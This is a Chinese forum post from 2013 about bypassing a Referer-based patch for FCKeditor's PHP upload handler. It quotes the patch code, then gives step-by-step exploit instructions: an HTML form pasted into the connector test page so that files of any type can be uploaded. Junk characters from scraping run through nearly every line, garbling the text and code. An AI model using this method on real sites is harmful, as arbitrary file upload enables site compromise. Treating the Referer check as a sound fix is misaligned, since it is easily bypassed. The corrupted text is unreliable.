漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php/ ]3 x0 J2 j' Z6 @5 e. E. A2 N
网上给出的修复方案是
" Q O) p9 o. i' J) Z修复方法,删除FCK编辑器用其他的编辑器
" z$ s* \6 V0 w( r或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
9 b0 J7 e6 ^! L# C6 v- A在
" c/ q, J) }- N' W( q0 U1 F0 v, N h: Irequire(‘config.php’);
! R0 T! e3 f+ S% u5 h7 i9 M: Xrequire(‘util.php’);
}( y9 P- d$ Z# w3 w/ F的下面添加以下代码—————————–/ p1 P8 f2 P6 S6 \, a
//防止外部提交$ B( N7 M; m1 `2 ]( g$ r! w W' H
function outsidepost()
9 e h* X. z5 n$ G{
5 ?9 o9 Y& n9 _: U0 l4 ^3 c$servername=$_SERVER['SERVER_NAME'];
( M7 Q" ~: A3 S: d# I$sub_from=@$_SERVER['HTTP_REFERER'];: Y* r. T# s4 @' F$ Z7 A0 ?. ?* C- O3 T
$sub_len=strlen($servername);! o* S' z7 q' C
$checkfrom=substr($sub_from,7,$sub_len);. ^: k; K# B g3 ~
if($checkfrom!=$servername){$ L" h9 D3 l: v! M" g
echo(“you don’t outsidepost!”);
* F& U6 C0 X% _7 F4 qexit;
6 a0 ~/ K `+ F}& M( B$ L' x3 A+ w5 O
}6 J0 I8 ~6 K' k/ s, v. o0 y
outsidepost();2 q+ o% q V3 e$ y) {6 ~5 j) A
防止外部提交,但是没有防止内部提交,& D% B* @8 H5 }& [+ G" d! e1 \
利用方法:5 u/ e2 g' ~# a" t1 q
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html- s0 h( _ g! r" d! h# }6 M
2,在Current Folder 框输入
" G/ U* k) F' U9 V/ Q4 g<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 F k: C( d& H) l$ ]3 k然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。* o. ~4 H! S" C, @6 _9 @' ~
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对